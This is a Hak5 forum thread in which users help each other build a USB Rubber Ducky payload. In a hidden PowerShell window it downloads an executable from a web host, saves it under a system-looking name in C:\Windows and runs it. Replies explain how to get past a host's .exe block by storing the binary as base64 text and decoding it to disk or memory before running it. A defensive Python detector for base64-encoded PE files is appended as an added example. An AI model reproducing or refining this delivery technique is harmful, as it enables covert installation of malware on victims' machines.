Hak5 Forums

Hi everyone, I'm trying to make a powershell wget and execute payload for the ducky but 000webhosting, my usual go-to webhost, doesn't allow .exe files. I was wondering if there was another hosting site that is free and does allow exes, or if there is some way I can encode the payload or something similar to get around such a block. I thought you might be able to encode it using base 64 in a text file, but I don't know how I'd make the powershell convert it from plaintext to binary using base64.

I was thinking something like this.

Any help is appreciated. Here is my script so far: 

$source = "mysite.com/executables/system32.exe"; $destination = "C:\Windows\system32helper.exe"; Invoke-WebRequest $source -OutFile $destination;
start-process system32.exe

That gets entered into a hidden powershell window. 

Thank you for your time. 


Welp, you can always get a vps and host it.

 

Or better yet, instead of everyone looking for hosting for exe files, why not base64 encode it and store it as a txt file.  Download that string, convert back to bytes and then write to drive or memory and execute.


That's what I wanted to figure out, was how to do such a base64 encoding and decoding in PowerShell. 

On 5/9/2018 at 6:34 PM, Finianb1 said:

That's what I wanted to figure out, was how to do such a base64 encoding and decoding in PowerShell. 

Instead of just giving the answer, the answer is the second answer here for handling binary files.  I tried to find a page to discuss it but everyone seems to be encoding text more than binary out there.

https://stackoverflow.com/questions/42592518/encode-decode-exe-into-base64

 

The premise is this.  You use the "[System.IO.File]::ReadAllBytes(<full path to binary>)" method from .net to read all bytes of the binary which will make a byte array and then use [convert]::ToBase64String() to convert that to base64 and save that string to a text file to host.  Your Posh script should download the contents of that text file and decode it from base64 and then you can write back out the bytes to the disk to run from disk as the original file or do whatever else you were going to do with it.

If the file was text like a script you would use [System.IO.File]::ReadAllText(<full path to text file>) and then use "[System.Text.Encoding]::ASCII.GetBytes(<string object>)" to convert to bytes to encode in base64.  If you plan on using the 

 

.NET functions do not take relative paths to files as parameters so you will have to use the full path to the file when reading them in.

"$(Resolve-Path -Path <relative path to file>).path" can be used to convert relative path to full path before passing to the .net functions.
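Added example, not part of any post in this thread or of the linked answer: storing an executable as base64 text gets it past a filter keyed on the .exe extension, but a content check on the hosting or proxy side can still recognise it, because base64 of the `MZ` header always begins `TV` followed by `o`, `p`, `q` or `r`. The Python sketch below finds such runs in a text body and confirms the PE signature after decoding; the function names and the sample header are constructed for illustration.

```python
import base64
import binascii
import re
import struct

# base64 of bytes starting "MZ" (0x4D 0x5A) always begins "TV" + one of o/p/q/r.
CANDIDATE = re.compile(r"TV[o-r][A-Za-z0-9+/\r\n]{80,}={0,2}")


def looks_like_pe(data: bytes) -> bool:
    """DOS header 'MZ' whose e_lfanew field (offset 0x3C) points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def find_base64_pe(text: str) -> list:
    """Return offsets in `text` where a base64 run decodes to a PE image."""
    hits = []
    for m in CANDIDATE.finditer(text):
        blob = re.sub(r"\s+", "", m.group(0))      # undo line wrapping
        blob = blob[: len(blob) - len(blob) % 4]   # keep whole 4-char groups
        try:
            data = base64.b64decode(blob, validate=True)
        except (binascii.Error, ValueError):
            continue
        if looks_like_pe(data):                    # prefix alone is not enough
            hits.append(m.start())
    return hits


def constructed_pe_header() -> bytes:
    """Constructed sample: 132 zero bytes carrying only the two PE markers."""
    hdr = bytearray(0x84)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x80)
    hdr[0x80:0x84] = b"PE\x00\x00"
    return bytes(hdr)


if __name__ == "__main__":
    hosted = "notes\n" + base64.encodebytes(constructed_pe_header()).decode()
    print(find_base64_pe(hosted))   # line-wrapped blob inside a text file
    print(find_base64_pe(base64.b64encode(b"MZ" + b"A" * 100).decode()))
```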

 

 
